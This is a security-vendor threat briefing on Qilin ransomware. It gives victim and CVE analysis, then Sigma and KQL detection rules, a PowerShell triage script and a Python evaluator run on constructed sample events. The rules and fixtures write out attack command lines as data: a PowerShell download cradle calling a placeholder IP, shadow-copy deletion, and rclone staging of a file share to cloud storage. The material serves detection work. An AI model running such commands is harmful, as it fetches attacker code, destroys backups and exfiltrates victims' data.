
QILIN Ransomware: 16 Victims Hit in Global Construction & Finance Surge — Detection Rules

Security Arsenal Team
June 22, 2026

Aliases: Agenda, Titan

Operating Model: Ransomware-as-a-Service (RaaS). Qilin operates on an affiliate model, recruiting diverse threat actors who conduct initial access and network intrusions, while the core team develops the Rust-based encryption payload.

Tactics & Extortion: Qilin practices "double extortion." Affiliates exfiltrate sensitive corporate data before encryption and threaten to publish it on the group's .onion leak site if negotiations fail. Ransom demands vary significantly with victim revenue but typically range from $500,000 to several million USD.

Initial Access Vectors: Current intelligence indicates heavy reliance on exploiting vulnerabilities in external-facing remote access solutions. Specifically, affiliates are targeting VPN appliances (Check Point, Cisco) and remote management tools (ConnectWise ScreenConnect). Phishing with macro-laden documents remains a secondary vector.

Dwell Time: Qilin affiliates typically dwell for 3 to 10 days before detonating the encryption payload, utilizing this time for lateral movement, credential dumping, and large-scale data staging.


Current Campaign Analysis

Sector Targeting: The latest batch of 16 victims reveals a distinct pivot towards the Construction sector (5 victims: Schumacher Homes, Florida Engineering Services, PJ Daly Contracting, Homes By J Anthony, Makel Companies Group). Manufacturing remains a consistent secondary target (3 victims), while the attack on the Central Bank of Libya signals a high-value incursion into Financial Services.

Geographic Concentration: The campaign is heavily US-centric (7 victims), but increasingly global. Recent hits span Libya, Thailand, Taiwan, Germany, Ireland, France, Chile, and Turkey, suggesting a broad, opportunistic spray targeting vulnerable internet-facing infrastructure rather than region-specific spear-phishing.

Victim Profile: Victims are primarily mid-market enterprises. The construction firms targeted are regional entities with significant operational technology (OT) or project management data, likely holding sensitive client blueprints and financial data attractive for extortion.

CVE Correlation: The victimology correlates strongly with the active exploitation of:

  • CVE-2024-1708 (ConnectWise ScreenConnect): Widely used by MSPs managing IT for construction and manufacturing firms.
  • CVE-2026-50751 (Check Point Security Gateway): Critical for perimeter security in the financial and telecommunication sectors (e.g., Central Bank of Libya, Sivatel Bangkok).
  • CVE-2026-20131 (Cisco Secure Firewall): Exploitation aligns with the network perimeter breaches required to access the geographically dispersed victims.

Detection Engineering

SIGMA Rules

YAML
---
title: ScreenConnect Client Service Spawning Command Shell
description: Detects the ScreenConnect client service launching cmd.exe or PowerShell on a managed endpoint. This is the post-exploitation pattern seen when a ScreenConnect server compromised via CVE-2024-1709 (authentication bypass) chained with CVE-2024-1708 (path traversal) is used to push commands to its agents.
author: Security Arsenal Research
date: 2026-06-22
status: experimental
tags:
  - attack.initial_access
  - attack.t1190
  - attack.t1219
  - cve.2024-1708
  - cve.2024-1709
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\ScreenConnect.ClientService.exe'
    # Sigma process_creation uses Image for the child process; NewProcessName is the raw 4688 field name.
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection
falsepositives:
  - Legitimate remote administration by IT support; baseline expected ScreenConnect operators and working hours before alerting
level: high
---
title: IIS Worker Process Spawning PowerShell Download Cradle
description: Detects w3wp.exe spawning cmd.exe or PowerShell with in-memory load or download keywords, a post-exploitation pattern following web-application RCE such as the Exchange deserialization flaw CVE-2023-21529. Do not filter out IIS APPPOOL identities; w3wp.exe normally runs under one (or as LocalSystem on Exchange), so such a filter suppresses the true positives.
author: Security Arsenal Research
date: 2026-06-22
status: experimental
tags:
  - attack.initial_access
  - attack.t1190
  - attack.t1059.001
  - cve.2023-21529
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\w3wp.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
    CommandLine|contains:
      - 'Add-Type'
      - 'DownloadString'
      - 'IEX'
      - 'Invoke-Expression'
  condition: selection
falsepositives:
  - Web applications that legitimately shell out to PowerShell (rare; verify against an application inventory)
level: critical
---
title: Suspicious PowerShell Download Cradle
author: Security Arsenal Research
date: 2026-06-22
description: Detects PowerShell download-and-execute one-liners of the kind used to stage Cobalt Strike beacons and other loaders in Qilin affiliate intrusions. A Cobalt Strike beacon has no fixed command line of its own, so this rule catches the stager pattern, not the implant.
status: experimental
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - 'Invoke-Expression'
  selection_url:
    # The re modifier is an unanchored search; no leading or trailing .* is needed.
    CommandLine|re: 'https?://[^/\s]+/(\S*\.js|api/\w+)'
  condition: all of selection*
falsepositives:
  - Legitimate system administration scripts that fetch code from internal web servers; allow-list those hosts
level: high

KQL (Microsoft Sentinel / Defender)

KQL
// Hunt for shadow-copy deletion and bulk data staging, two pre-encryption steps common in Qilin incidents.
// DeviceProcessEvents names the process image FileName (there is no ProcessName column) and the
// operator is has_any, not hasAny. Do not exclude SYSTEM: ransomware frequently runs via PsExec or a
// scheduled task as SYSTEM, and the original "!= SYSTEM" filter would drop exactly those events.
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where FileName in~ ("vssadmin.exe", "wmic.exe", "wbadmin.exe", "robocopy.exe", "rclone.exe", "powershell.exe", "cmd.exe")
| where ProcessCommandLine has_any ("delete shadows", "shadowcopy delete", "delete catalog", "resize shadowstorage")
    or (FileName in~ ("robocopy.exe", "rclone.exe") and ProcessCommandLine has_any ("/mir", "/zb", "copy", "sync", "move"))
| extend Activity = iff(ProcessCommandLine has_any ("delete shadows", "shadowcopy delete", "delete catalog", "resize shadowstorage"), "VSS Deletion", "File Staging")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, Activity
| order by Timestamp desc
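As an added example (not part of the original post), the following Python evaluator applies the Sigma selections above and the two branches of the KQL hunt to a handful of constructed process-creation events, so the matching logic can be checked offline before it is pushed to a SIEM. Field names follow Sigma's process_creation taxonomy (Image, ParentImage, CommandLine, User); every event, path, IP address and account name in it is constructed for the example, not real telemetry.

```python
"""Offline evaluator for Sigma-style process_creation selections (added example)."""
import re

# Constructed sample telemetry, not real events.
EVENTS = [
    # 0: ScreenConnect client service pushing a shell to a managed endpoint
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "CommandLine": 'cmd.exe /c "whoami /all"', "User": r"NT AUTHORITY\SYSTEM"},
    # 1: IIS worker process launching a PowerShell download cradle
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/api/init')",
     "User": r"IIS APPPOOL\MSExchangeOWAAppPool"},
    # 2: shadow copy deletion ahead of encryption
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet", "User": r"CORP\svc_backup"},
    # 3: rclone staging a file share to cloud storage
    {"Image": r"C:\ProgramData\rclone.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rclone.exe copy \\FS01\Projects mega:stage --transfers 16 -q",
     "User": r"CORP\svc_backup"},
    # 4: benign: the ScreenConnect service starting its own UI component
    {"Image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.WindowsClient.exe",
     "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "CommandLine": "ScreenConnect.WindowsClient.exe", "User": r"NT AUTHORITY\SYSTEM"},
    # 5: benign: interactive admin PowerShell with no download cradle
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Service -Name MSExchangeIS", "User": r"CORP\jdoe"},
]

# Rules as Sigma-style selections: keys inside a selection are AND-ed, list values
# are OR-ed, and every selection listed must match (Sigma's "all of selection*").
RULES = {
    "screenconnect_client_shell": {"selections": [
        {"ParentImage|endswith": r"\ScreenConnect.ClientService.exe",
         "Image|endswith": [r"\cmd.exe", r"\powershell.exe", r"\pwsh.exe"]}]},
    "w3wp_shell_spawn": {"selections": [
        {"ParentImage|endswith": r"\w3wp.exe",
         "Image|endswith": [r"\powershell.exe", r"\pwsh.exe", r"\cmd.exe"],
         "CommandLine|contains": ["Add-Type", "DownloadString", "IEX"]}]},
    "powershell_download_cradle": {"selections": [
        {"Image|endswith": [r"\powershell.exe", r"\pwsh.exe"],
         "CommandLine|contains": ["DownloadString", "IEX"]},
        {"CommandLine|re": r"https?://[^/\s]+/(\S*\.js|api/\w+)"}]},
    # The two branches of the KQL hunt, expressed as selections
    "shadow_copy_deletion": {"selections": [
        {"Image|endswith": [r"\vssadmin.exe", r"\wmic.exe", r"\wbadmin.exe"],
         "CommandLine|contains": ["delete shadows", "shadowcopy delete", "delete catalog"]}]},
    "exfil_staging": {"selections": [
        {"Image|endswith": [r"\rclone.exe", r"\robocopy.exe"],
         "CommandLine|contains": [" copy ", " sync ", "/mir", "/zb"]}]},
}


def field_matches(value, modifier, pattern):
    """Sigma string matching is case-insensitive; 're' is an unanchored regex search."""
    if modifier == "re":
        return re.search(pattern, value, re.IGNORECASE) is not None
    v, p = value.lower(), pattern.lower()
    if modifier == "endswith":
        return v.endswith(p)
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "contains":
        return p in v
    return v == p  # no modifier: exact, case-insensitive


def selection_matches(event, selection):
    """Every key must match (AND); a list value matches if any entry matches (OR)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = str(event.get(field, ""))
        if isinstance(patterns, str):
            patterns = [patterns]
        if not any(field_matches(value, modifier, p) for p in patterns):
            return False
    return True


def evaluate(events=EVENTS, rules=RULES):
    """Return {rule_name: [indices of events that satisfy every selection of the rule]}."""
    return {name: [i for i, ev in enumerate(events)
                   if all(selection_matches(ev, s) for s in rule["selections"])]
            for name, rule in rules.items()}


if __name__ == "__main__":
    for name, hits in evaluate().items():
        print(f"{name:28s} -> events {hits}")
```

Running it shows the two benign events (4 and 5) matching nothing, while event 1 fires both the w3wp rule and the download-cradle rule, which is the expected overlap for a web-shell-to-stager chain. Swap in a de-identified export of your own process telemetry to measure the false-positive rate of each selection before enabling it.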

PowerShell Response Script

PowerShell
<#
.SYNOPSIS
    Qilin Ransomware T-Minus Response Script
.DESCRIPTION
    Checks a single host for common Qilin persistence mechanisms and pre-encryption
    staging indicators. Run elevated. The Security log check requires process creation
    auditing (Event ID 4688); command lines appear only if "Include command line in
    process creation events" is enabled.
#>

Write-Host "[+] Checking for Scheduled Tasks registered in the last 24 hours (Persistence)..."
# Task.Date is a string taken from the task XML (or $null), so cast it before comparing;
# comparing the raw string against a DateTime silently gives wrong results.
$Since = (Get-Date).AddHours(-24)
Get-ScheduledTask | Where-Object { $_.Date -and ([datetime]$_.Date) -gt $Since } |
    Select-Object TaskName, TaskPath, Date, Author

Write-Host "[+] Checking for shadow copy / backup tampering (Security Event ID 4688)..."
# NewProcessName in 4688 is a full path, so an exact XPath match on 'vssadmin.exe' never fires;
# pull a time window of 4688 events and filter on the rendered message instead.
$VSSEvents = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-7) } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match '\\(vssadmin|wbadmin|wmic|bcdedit)\.exe' }
if ($VSSEvents) { $VSSEvents | Select-Object TimeCreated, Message | Format-List } else { Write-Host "No recent vssadmin/wbadmin/wmic/bcdedit execution found." }

Write-Host "[+] Scanning for common ransomware extensions in user directories..."
# Qilin builds commonly append a victim-specific extension; add the one from your ransom note.
$Paths = @("C:\Users", "D:\") | Where-Object { Test-Path $_ }
$Extensions = @("*.qilin", "*.encrypted", "*.locked")
foreach ($Path in $Paths) {
    Get-ChildItem -Path $Path -Include $Extensions -Recurse -File -Force -ErrorAction SilentlyContinue |
        Select-Object -First 50 FullName, LastWriteTime
}
